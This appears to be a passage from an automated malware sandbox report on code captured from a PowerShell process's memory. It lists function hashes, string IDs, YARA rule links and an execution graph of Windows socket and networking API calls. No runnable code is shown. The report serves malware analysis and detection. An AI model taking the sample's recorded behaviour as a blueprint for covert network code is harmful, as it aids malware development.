                                                                                • Opcode ID: 5e77591edbfc041cbd868b9c71d352f24b14c1050a7fe96a099d4feb1d94e960
                                                                                • Instruction ID: a3653dc78f43f67c63e14f002005d210dbe78b11b35202c5001c3230e2f58a22
                                                                                • Opcode Fuzzy Hash: 5e77591edbfc041cbd868b9c71d352f24b14c1050a7fe96a099d4feb1d94e960
                                                                                • Instruction Fuzzy Hash: 354126F5A00312CFCB358F14A850B697BA26FC2314F59889ADD24AF2D6C732C845C7E2
                                                                                Function 07A01F34 Relevance: .0, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 61979565bd527cd72052fe73e1b6d0896b0e80fe603a7c8e34d25af5f7fcc408
                                                                                • Instruction ID: 0b2e2fb2949fe4434becbec6f867f4bef0d515c37e6c47863bcd1963c10b53f9
                                                                                • Opcode Fuzzy Hash: 61979565bd527cd72052fe73e1b6d0896b0e80fe603a7c8e34d25af5f7fcc408
                                                                                • Instruction Fuzzy Hash: 27F055B9B0030A8BCB15CB50D90548AFB71EB99300B28C49EEE2E4E183CA32D806C781

                                                                                Non-executed Functions

                                                                                Function 07A0CA50 Relevance: 11.7, Strings: 9, Instructions: 447COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q
                                                                                • API String ID: 0-3999708322
                                                                                • Opcode ID: c36b021e3faa6fa1e6ff480c189ba7ff8342001842521d95825a71a76092e391
                                                                                • Instruction ID: 575665e73033de4ae1d9bf3604cb2fb1993766bf591606d74c7d6bac0677846d
                                                                                • Opcode Fuzzy Hash: c36b021e3faa6fa1e6ff480c189ba7ff8342001842521d95825a71a76092e391
                                                                                • Instruction Fuzzy Hash: DDE1E6B1B043158FCB249B68E4146EABBB2AFC6330F14C9AAD425CB291D731D945C7F1
                                                                                Function 07A0E920 Relevance: 9.2, Strings: 7, Instructions: 468COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
                                                                                • API String ID: 0-2432477355
                                                                                • Opcode ID: 9288e26e4346a67fcdccfe0bd2924eacaa250927c00c4c5845e1711ad4b23399
                                                                                • Instruction ID: 96463ebb484f3c76693774807f0bc62d0079a727099c2cf15b6d14442a8c1843
                                                                                • Opcode Fuzzy Hash: 9288e26e4346a67fcdccfe0bd2924eacaa250927c00c4c5845e1711ad4b23399
                                                                                • Instruction Fuzzy Hash: ABF148B2B083158FD724AB68A40136ABBF2AFC6311F188C6ED965CB291DB31DC45D7D1
                                                                                Function 07A08370 Relevance: 9.0, Strings: 7, Instructions: 277COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q
                                                                                • API String ID: 0-1721289453
                                                                                • Opcode ID: 68edffa425f3be5a220a42417f7fa831423d59cb1dd9c534a09b7d57084fdf28
                                                                                • Instruction ID: 3d0cd6af84891894805916161368be84e4a37ab7030333f973c91fe4bb7cf8ca
                                                                                • Opcode Fuzzy Hash: 68edffa425f3be5a220a42417f7fa831423d59cb1dd9c534a09b7d57084fdf28
                                                                                • Instruction Fuzzy Hash: 86915AB5B00306CFDB258B25B8147AA7BB1AFC5310F15887AD925CB2C1DB39D841CBE6
                                                                                Function 07A08773 Relevance: 8.9, Strings: 7, Instructions: 153COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$TQq$TQq$tPq$$q$$q$$q
                                                                                • API String ID: 0-2980145124
                                                                                • Opcode ID: eb32e53b4a29585f28aa6481cca05995664d191f3133f6bb32ba359d34a29515
                                                                                • Instruction ID: c1ffccdf4d2e0060d24f3cca830b82c07546786407ffc3ef2be3213f75c46546
                                                                                • Opcode Fuzzy Hash: eb32e53b4a29585f28aa6481cca05995664d191f3133f6bb32ba359d34a29515
                                                                                • Instruction Fuzzy Hash: 1D51D0B0600206DFDB24CF05E5447A9B7B2BF85392F198866E8255B2D0C739EC94CBDA
                                                                                Function 07A0A186 Relevance: 7.8, Strings: 6, Instructions: 292COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                                                                • API String ID: 0-1794337482
                                                                                • Opcode ID: df86897bfe60202002859122d34c3abb26caa5d150a5947945d9f5e9eaff933c
                                                                                • Instruction ID: 017edc368ea8cc4410f1e4eb2f8b486e8b8099159ce09a00efe9021b7ae79a08
                                                                                • Opcode Fuzzy Hash: df86897bfe60202002859122d34c3abb26caa5d150a5947945d9f5e9eaff933c
                                                                                • Instruction Fuzzy Hash: 83D14FB4A003289FDB24DB24D854BDEBBB2BB89304F5085D5D9096B385CB35EE85CF91
                                                                                Function 07A00528 Relevance: 7.7, Strings: 6, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$$q$$q$$q$$q
                                                                                • API String ID: 0-1538229613
                                                                                • Opcode ID: 8b8408a63fb409caa12d23b4efa3c921575eeab3b09011c6bb1bc2f407f1946e
                                                                                • Instruction ID: b5ffac4d1bd70e6e4f801df26d1fc5dc66862ae7f3400f91717c507567d13ac0
                                                                                • Opcode Fuzzy Hash: 8b8408a63fb409caa12d23b4efa3c921575eeab3b09011c6bb1bc2f407f1946e
                                                                                • Instruction Fuzzy Hash: B05104B57043169FDB248B69A80077BBBF6AFC5311F18C87AD865C7281DA71D842CBE1
                                                                                Function 07A0E5F8 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$tPq$tPq$$q
                                                                                • API String ID: 0-2921073781
                                                                                • Opcode ID: 0bd522352df1cf2d60ab232c78a41935969915542d1d103ac4b6445cf9ecf5fd
                                                                                • Instruction ID: 733f2d26fac9283bbfac2565512877cf198576b5421082a84ffb594651898910
                                                                                • Opcode Fuzzy Hash: 0bd522352df1cf2d60ab232c78a41935969915542d1d103ac4b6445cf9ecf5fd
                                                                                • Instruction Fuzzy Hash: 49818CB5B0C3858FD7216764A41536ABFB2AFC2311F188CAEC565CB2D2DA31C845CBD2
                                                                                Function 07A09068 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$tPq$$q$$q$$q
                                                                                • API String ID: 0-838716513
                                                                                • Opcode ID: af75b1e57d6fda317ef2d47d637260bc3cff42ea2d91b98ebb3749b946b5319e
                                                                                • Instruction ID: 126a2757a75b102cbfb3b0d070a8eb96166072eca38f2cd784da03874069d461
                                                                                • Opcode Fuzzy Hash: af75b1e57d6fda317ef2d47d637260bc3cff42ea2d91b98ebb3749b946b5319e
                                                                                • Instruction Fuzzy Hash: EA6183B0710206DFDB288F15E5457AB77B2AF8A351F198859E8255B2D2C772F880CBE1
                                                                                Function 07A01DCC Relevance: 6.3, Strings: 5, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$$q$$q$$q
                                                                                • API String ID: 0-170447905
                                                                                • Opcode ID: 03f56a49fdef39a39cdcb01f58e34f5fcd9e49c11a0d2fd818bedb98089371e2
                                                                                • Instruction ID: dc04389cd05020b22d09ae6777ce45bff861c18c33a04c951d64a69c64b09540
                                                                                • Opcode Fuzzy Hash: 03f56a49fdef39a39cdcb01f58e34f5fcd9e49c11a0d2fd818bedb98089371e2
                                                                                • Instruction Fuzzy Hash: 8121D6B570020ECBDB254B65F4146FEBB72AFC6322F14886AD8268B2C0DB35C562C7D1
                                                                                Function 07A0D1F8 Relevance: 6.3, Strings: 5, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tPq$$q$$q$$q$$q
                                                                                • API String ID: 0-3665043458
                                                                                • Opcode ID: 03478fd898190a546bda0919afd8bc9d0c373bad82166a98230c12857ac94902
                                                                                • Instruction ID: ce33654a4fb59e457544a0f10fba0c9b2e67bfecc8f3d0d0d90631893df2231c
                                                                                • Opcode Fuzzy Hash: 03478fd898190a546bda0919afd8bc9d0c373bad82166a98230c12857ac94902
                                                                                • Instruction Fuzzy Hash: 912121F77003169FCB208FE4F440A65BBB4AF89710F19492AEC249B291C730D940C7E1
                                                                                Function 07A07C60 Relevance: 5.5, Strings: 4, Instructions: 467COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (oq$(oq$(oq$(oq
                                                                                • API String ID: 0-3853041632
                                                                                • Opcode ID: 0aa27b7782e7e7285ec742f2dd55b9a85bc70b6efc9752f9b93b5dc7c8658abe
                                                                                • Instruction ID: 9300b1d8356cc73385db74457076a5263dbc734b163122dec5b7f5e037fb6bf6
                                                                                • Opcode Fuzzy Hash: 0aa27b7782e7e7285ec742f2dd55b9a85bc70b6efc9752f9b93b5dc7c8658abe
                                                                                • Instruction Fuzzy Hash: 19F137B1B04306DFDF158F64E850BAA7BA2BFC5311F14886AE9258B2D1DB35E841CBD1
                                                                                Function 07A0D7D8 Relevance: 5.4, Strings: 4, Instructions: 407COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tPq$tPq$tPq$tPq
                                                                                • API String ID: 0-3476066832
                                                                                • Opcode ID: da9143c7f7c59f9cf91a842863ee436b9e7d9c8425d690af9dddaad4f42ec991
                                                                                • Instruction ID: a8ee34643fbfa20badee8b34c58659a632965e76ea00c4b5eab30517a4ac1254
                                                                                • Opcode Fuzzy Hash: da9143c7f7c59f9cf91a842863ee436b9e7d9c8425d690af9dddaad4f42ec991
                                                                                • Instruction Fuzzy Hash: 5CE127B2B043149FD7249BA9A401B6ABBB2BFC9311F18C86AE9559F381CA71DC05C7D1
                                                                                Function 07A09430 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: XRq$XRq$tPq$$q
                                                                                • API String ID: 0-1549039314
                                                                                • Opcode ID: 08f12d04d380b976abbc68f97fda22bbf1d4e3b176d3798248559f28e37673c3
                                                                                • Instruction ID: 3080b7a2fa82cda97325af6321259a33d4d0231c08812a5e3559feaca4cb91d5
                                                                                • Opcode Fuzzy Hash: 08f12d04d380b976abbc68f97fda22bbf1d4e3b176d3798248559f28e37673c3
                                                                                • Instruction Fuzzy Hash: FD4162B5A04205DBDB248F15E145AABBBF2AF85310F19C899E8256B2D2C732FD44CBD1
                                                                                Function 07A00858 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q$$q$$q$$q
                                                                                • API String ID: 0-4102054182
                                                                                • Opcode ID: 5091e76a88db365b70d82778ceeb422d8ea4cb48057e95cd40da85daa5345051
                                                                                • Instruction ID: 58d089b4fda1c9c8667bd4fe70fde394a349c47ca253ae27a40d9f77e36fa2e6
                                                                                • Opcode Fuzzy Hash: 5091e76a88db365b70d82778ceeb422d8ea4cb48057e95cd40da85daa5345051
                                                                                • Instruction Fuzzy Hash: 322135B23003065BEB34166A6800B277AA6EFC0352F24882AF959CB3C5CD71C84583E1
                                                                                Function 07A07000 Relevance: 5.1, Strings: 4, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q$$q$$q$$q
                                                                                • API String ID: 0-4102054182
                                                                                • Opcode ID: 92988b9d34093cdada3f5f096846a2484a77922b0d5ddc8ce94221fc581f5a93
                                                                                • Instruction ID: 4ddcc09da293f4b56d80d1d67cd4d1266863182436e61397780b99841510c92d
                                                                                • Opcode Fuzzy Hash: 92988b9d34093cdada3f5f096846a2484a77922b0d5ddc8ce94221fc581f5a93
                                                                                • Instruction Fuzzy Hash: 9621D3B1904347CFDF218F65BD50266BBB0BF82310F1949ABD864872D2D735A548C7A2
                                                                                Function 07A01280 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$$q$$q
                                                                                • API String ID: 0-3199993180
                                                                                • Opcode ID: a764f860f6e294fe908b76ba0b943703e91908ec807769f7fcef332d738f4c22
                                                                                • Instruction ID: f3769f85057a55127036fa45156917debf2d9f7ead964da4de9e1682ded55ad2
                                                                                • Opcode Fuzzy Hash: a764f860f6e294fe908b76ba0b943703e91908ec807769f7fcef332d738f4c22
                                                                                • Instruction Fuzzy Hash: F801B16160E3DA8FC32743B878202996FB25B9321072E09D7C8D1DF2D7CA194D09C3AB

                                                                                Execution Graph

                                                                                Execution Coverage:2.4%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:1.5%
                                                                                Total number of Nodes:1578
                                                                                Total number of Limit Nodes:17
                                                                                execution_graph 15198 53c453e 15201 53c4551 15198->15201 15202 53c455b 15201->15202 15205 53c9721 15202->15205 15204 53c454f 15206 53c972d 15205->15206 15207 53c973d 15205->15207 15206->15204 15207->15206 15210 53c9ef3 15207->15210 15212 53c9f20 15210->15212 15211 53c9762 15211->15204 15212->15211 15213 53c9f56 15212->15213 15214 53c9f49 CreateEventA 15212->15214 15216 53c9f64 memset 15213->15216 15214->15213 15218 53c9f91 memset 15216->15218 15219 53c9fdd WSARecv 15218->15219 15220 53c9fd5 15218->15220 15221 53ca01f GetLastError 15219->15221 15222 53c9fff 15219->15222 15220->15219 15221->15222 15223 53ca02c WSAGetLastError 15221->15223 15226 53ca07a RegisterWaitForSingleObject 15222->15226 15227 53ca009 15222->15227 15224 53ca03e WSAGetLastError 15223->15224 15225 53ca036 WSAGetLastError 15223->15225 15224->15227 15225->15227 15226->15227 15227->15211 16901 53c2d39 16902 53c2d48 16901->16902 16906 53c2d71 16902->16906 16917 53c39c1 16902->16917 16905 53c2d68 16925 53c2dba 16905->16925 16909 53c2d6e 16906->16909 16910 53c1a2b 16906->16910 16931 53c1b75 malloc 16910->16931 16912 53c1a43 16933 53c570f malloc 16912->16933 16914 53c1a67 16936 53c1bd9 malloc 16914->16936 16918 53c39e5 __cfltcvt 16917->16918 16919 53c39f1 memset getaddrinfo 16918->16919 16920 53c2d62 16919->16920 16922 53c3a2e __cfltcvt 16919->16922 16920->16905 16920->16906 16921 53c3aa1 FreeAddrInfoW 16921->16920 16922->16921 16923 53c3a57 16922->16923 16924 53c3a8c htons 16922->16924 16923->16921 16924->16921 16927 53c2dd8 16925->16927 16926 53c2e28 16929 53c9659 19 API calls 16926->16929 16930 53c2e47 16926->16930 16927->16926 16928 53c3c47 free 16927->16928 16928->16926 16929->16930 16930->16909 16932 53c1b8f 16931->16932 16932->16912 16934 53c571f memset 16933->16934 16935 53c5741 16933->16935 16934->16935 16935->16914 16937 53c1be9 16936->16937 16940 53c1c20 16937->16940 16945 53c419f 16940->16945 16943 53c1a9d 16943->16909 16944 53c1c6a free 16944->16943 16955 53c4129 malloc 16945->16955 16947 53c41b0 16948 53c41fd __cfltcvt 16947->16948 16949 53c41c1 __cfltcvt 16947->16949 16954 53c1c3a 16947->16954 16961 53cad54 16948->16961 16949->16954 16965 53cad96 16949->16965 16952 53c41f8 16953 53c4263 42 API calls 16952->16953 16952->16954 16953->16954 16954->16943 16954->16944 16956 53c4141 16955->16956 16957 53c4148 free 16956->16957 16958 53c4154 16956->16958 16957->16947 16969 53c4164 malloc memset 16958->16969 16960 53c4160 16960->16947 16962 53cad62 16961->16962 16964 53cad81 16961->16964 16962->16964 16971 53ca0c0 16962->16971 16964->16952 16966 53cada4 16965->16966 16968 53cadc4 16965->16968 16966->16968 17019 53ca223 16966->17019 16968->16952 16970 53c4186 16969->16970 16970->16960 16972 53ca0e1 16971->16972 16981 53ca0d8 16971->16981 16973 53ca0fa 16972->16973 16982 53cacdd 16972->16982 16975 53ca12d memset 16973->16975 16973->16981 16986 53cae30 16973->16986 16978 53ca16c 16975->16978 16979 53ca1be GetLastError 16978->16979 16978->16981 16980 53ca1cb WSAGetLastError 16979->16980 16979->16981 16980->16981 16981->16964 16983 53cace9 16982->16983 16985 53cad04 16982->16985 16983->16985 16989 53c9a41 16983->16989 16985->16973 17017 53cadf8 WSAIoctl 16986->17017 16992 53c9a57 16989->16992 16991 53c9a53 16991->16985 16993 53c9ace bind 16992->16993 16994 53c9a65 socket 16992->16994 16995 53c9ae2 WSAGetLastError 16993->16995 16998 53c9a7f 16993->16998 16996 53c9a8f SetHandleInformation 16994->16996 16997 53c9a79 WSAGetLastError 16994->16997 16995->16998 16999 53c9a9e GetLastError 16996->16999 17000 53c9ab8 16996->17000 16997->16998 16998->16991 17001 53c9aad 16999->17001 17005 53c9b02 ioctlsocket 17000->17005 17004 53c9aaf closesocket 17001->17004 17003 53c9ac7 17003->16993 17003->17004 17004->16998 17006 53c9b3e CreateIoCompletionPort 17005->17006 17007 53c9b28 WSAGetLastError 17005->17007 17008 53c9b5a 17006->17008 17012 53c9b60 17006->17012 17014 53c9b2e 17007->17014 17009 53c9b96 GetLastError 17008->17009 17008->17012 17009->17014 17010 53c9b90 17011 53c9bc3 17010->17011 17013 53c9bfb setsockopt _errno 17010->17013 17010->17014 17011->17014 17016 53c9c32 _errno 17011->17016 17012->17010 17015 53c9b87 SetFileCompletionNotificationModes 17012->17015 17013->17011 17014->17003 17015->17010 17016->17014 17018 53ca11d 17017->17018 17018->16975 17018->16981 17020 53ca244 17019->17020 17029 53ca23b 17019->17029 17021 53ca25e 17020->17021 17030 53cad18 17020->17030 17023 53ca291 memset 17021->17023 17024 53cae30 WSAIoctl 17021->17024 17021->17029 17026 53ca2d0 17023->17026 17025 53ca281 17024->17025 17025->17023 17025->17029 17027 53ca322 GetLastError 17026->17027 17026->17029 17028 53ca32f WSAGetLastError 17027->17028 17027->17029 17028->17029 17029->16968 17031 53cad24 17030->17031 17033 53cad40 17030->17033 17031->17033 17034 53c9c8c 17031->17034 17033->17021 17035 53c9a57 15 API calls 17034->17035 17036 53c9c9e 17035->17036 17036->17033 15228 53c427f 15229 53c428c 15228->15229 15230 53c429a 15229->15230 15236 53c42f5 15229->15236 15243 53c3c47 15230->15243 15250 53cf03c 15236->15250 15238 53c4300 15239 53c3c47 free 15238->15239 15240 53c430c 15239->15240 15262 53c431e memset 15240->15262 15242 53c4312 free 15242->15230 15244 53c3c67 15243->15244 15245 53c3c54 15243->15245 15247 53c42c2 15244->15247 15245->15244 15350 53c3bd5 15245->15350 15353 53c9659 15247->15353 15249 53c42b4 15253 53cf049 _mbstowcs_s 15250->15253 15261 53cf0fd _mbstowcs_s 15250->15261 15251 53cf08b 15252 53cf098 15251->15252 15264 53cef4e 15251->15264 15256 53cf0b3 15252->15256 15270 53cef8e 15252->15270 15253->15251 15254 53cf083 free 15253->15254 15254->15251 15259 53cf0eb strlen 15256->15259 15256->15261 15258 53cf0ab 15260 53cef4e free 15258->15260 15259->15261 15260->15256 15261->15238 15263 53c433f 15262->15263 15263->15242 15265 53cef57 15264->15265 15269 53cef7e _mbstowcs_s 15264->15269 15276 53d2427 15265->15276 15267 53cef75 15268 53d2427 free 15267->15268 15268->15269 15269->15252 15271 53cef9a 15270->15271 15275 53cefc8 _mbstowcs_s 15270->15275 15280 53d6eef 15271->15280 15273 53cefbc 15302 53d67b6 15273->15302 15275->15258 15277 53d2430 _mbstowcs_s 15276->15277 15278 53d2463 _mbstowcs_s 15276->15278 15277->15278 15279 53d2457 free 15277->15279 15278->15267 15279->15278 15281 53d6ef8 15280->15281 15301 53d6f52 _mbstowcs_s 15280->15301 15312 53cf49d 15281->15312 15284 53cf49d _mbstowcs_s free 15285 53d6f0a 15284->15285 15286 53cf49d _mbstowcs_s free 15285->15286 15287 53d6f13 15286->15287 15288 53cf49d _mbstowcs_s free 15287->15288 15289 53d6f1c 15288->15289 15290 53cf49d _mbstowcs_s free 15289->15290 15291 53d6f25 15290->15291 15292 53cf49d _mbstowcs_s free 15291->15292 15293 53d6f2e 15292->15293 15294 53cf49d _mbstowcs_s free 15293->15294 15295 53d6f37 15294->15295 15296 53cf49d _mbstowcs_s free 15295->15296 15297 53d6f40 15296->15297 15298 53cf49d _mbstowcs_s free 15297->15298 15299 53d6f49 15298->15299 15300 53cf49d _mbstowcs_s free 15299->15300 15300->15301 15301->15273 15303 53d67e9 15302->15303 15304 53d67bf 15302->15304 15303->15275 15316 53d8aec 15304->15316 15307 53d8aec __cfltcvt free 15308 53d67d7 15307->15308 15309 53cf49d _mbstowcs_s free 15308->15309 15310 53d67e3 15309->15310 15324 53d67ee 15310->15324 15313 53cf4a6 _mbstowcs_s 15312->15313 15314 53cf4c2 15312->15314 15313->15314 15315 53cf4b6 free 15313->15315 15314->15284 15315->15314 15317 53d8af5 15316->15317 15318 53d67cb 15316->15318 15319 53cf49d _mbstowcs_s free 15317->15319 15318->15307 15320 53d8afb 15319->15320 15321 53cf49d _mbstowcs_s free 15320->15321 15322 53d8b04 15321->15322 15323 53cf49d _mbstowcs_s free 15322->15323 15323->15318 15335 53d8b12 15324->15335 15326 53d67f9 15327 53cf49d _mbstowcs_s free 15326->15327 15328 53d6802 15327->15328 15329 53d8aec __cfltcvt free 15328->15329 15330 53d680e 15329->15330 15331 53d8aec __cfltcvt free 15330->15331 15332 53d681a 15331->15332 15333 53cf49d _mbstowcs_s free 15332->15333 15334 53d6826 15333->15334 15334->15303 15336 53d8b1e 15335->15336 15337 53d8b81 _mbstowcs_s 15335->15337 15338 53cf49d _mbstowcs_s free 15336->15338 15340 53d8b51 15336->15340 15337->15326 15341 53d8b2d 15338->15341 15339 53d8b76 free 15339->15337 15340->15337 15340->15339 15342 53d8aec __cfltcvt free 15340->15342 15343 53cf49d _mbstowcs_s free 15341->15343 15342->15340 15344 53d8b36 15343->15344 15345 53cf49d _mbstowcs_s free 15344->15345 15346 53d8b3f 15345->15346 15347 53d8aec __cfltcvt free 15346->15347 15348 53d8b48 15347->15348 15349 53cf49d _mbstowcs_s free 15348->15349 15349->15340 15351 53c3bdf free 15350->15351 15352 53c3bea 15350->15352 15351->15352 15352->15244 15354 53c9668 15353->15354 15357 53c9685 15353->15357 15355 53c96f3 abort 15354->15355 15356 53c967e 15354->15356 15354->15357 15358 53c968a 15354->15358 15359 53c9693 15354->15359 15363 53caa5b 15356->15363 15357->15249 15375 53cbc6d 15358->15375 15379 53cbac0 15359->15379 15364 53caa97 15363->15364 15365 53caa73 15363->15365 15369 53cab98 2 API calls 15364->15369 15371 53caa8c 15364->15371 15366 53caa7a shutdown 15365->15366 15367 53caa86 15365->15367 15366->15371 15383 53cab98 15367->15383 15372 53caaaa 15369->15372 15370 53cab4a closesocket 15373 53cab57 15370->15373 15371->15370 15371->15373 15372->15371 15374 53caad3 closesocket 15372->15374 15373->15357 15374->15372 15388 53cadd9 15375->15388 15377 53cbc78 closesocket 15378 53cbc89 15377->15378 15378->15357 15380 53cbacf 15379->15380 15381 53cbad4 15379->15381 15390 53cbade 15380->15390 15381->15357 15384 53cabb0 15383->15384 15385 53cabde CancelIo 15384->15385 15386 53cabbb WSAIoctl 15384->15386 15385->15371 15386->15385 15387 53cabd9 15386->15387 15387->15371 15389 53cade3 15388->15389 15389->15377 15391 53cbaf2 15390->15391 15392 53cbb19 15391->15392 15394 53cbb3f 15391->15394 15392->15381 15399 53cbbab 15394->15399 15398 53cbb80 15398->15392 15412 53c8dfb 15399->15412 15402 53cb2a0 15403 53cb2c0 CreateEventA 15402->15403 15405 53cb2b1 15402->15405 15404 53cb329 15403->15404 15403->15405 15404->15398 15406 53cb305 WaitForSingleObject 15405->15406 15407 53cb331 CloseHandle 15405->15407 15411 53cb338 15405->15411 15408 53cb32e 15406->15408 15409 53cb313 GetLastError CloseHandle WSASetLastError 15406->15409 15407->15411 15408->15407 15409->15404 15410 53cb354 WSASetLastError 15410->15404 15411->15410 15413 53c8e04 15412->15413 15414 53c8e0e 15412->15414 15416 53c8e11 CreateEventA InterlockedCompareExchange 15413->15416 15414->15402 15417 53c8e4c CloseHandle WaitForSingleObject 15416->15417 15418 53c8e3d SetEvent 15416->15418 15419 53c8e5e 15417->15419 15418->15419 15419->15414 17037 53c9659 17038 53c9668 17037->17038 17041 53c9685 17037->17041 17039 53c96f3 abort 17038->17039 17040 53c967e 17038->17040 17038->17041 17042 53c968a 17038->17042 17043 53c9693 17038->17043 17044 53caa5b 5 API calls 17040->17044 17045 53cbc6d closesocket 